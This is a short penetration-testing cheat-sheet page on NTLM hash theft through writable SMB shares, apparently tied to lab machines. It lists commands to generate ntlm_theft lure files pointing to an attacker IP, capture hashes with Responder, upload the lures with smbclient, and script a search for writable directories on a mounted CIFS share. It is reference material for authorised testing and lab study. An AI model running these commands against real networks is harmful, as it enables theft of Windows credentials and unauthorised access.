Find Write to Share NTLM Theft

https://github.com/Greenwolf/ntlm_theft

python3 /opt/ntlm_theft/ntlm_theft.py -g all -s 10.10.14.91 --filename flight
sudo responder -I tun0
smbclient //g0/Shared -U s.moon
prompt off
mput *

Finding the writable share

Mount the cifs share and find writable directories

sudo mount -t cifs "//10.10.10.103/Department Shares" /mnt
cd /mnt
find . -type d | while read directory; do sudo touch ${directory}/testtouch 2>/dev/null && echo "${directory} - write file" && sudo rm ${directory}/testtouch; sudo mkdir ${directory}/testtouch 2>/dev/null && echo "${directory} - write directory" && sudo rmdir ${directory}/testtouch; done

Using smbcacls

smbcacls -N //ip/Share /Folder
PreviousFind ipv6 Ipv6 Port ScanningNextForce auth back to yourself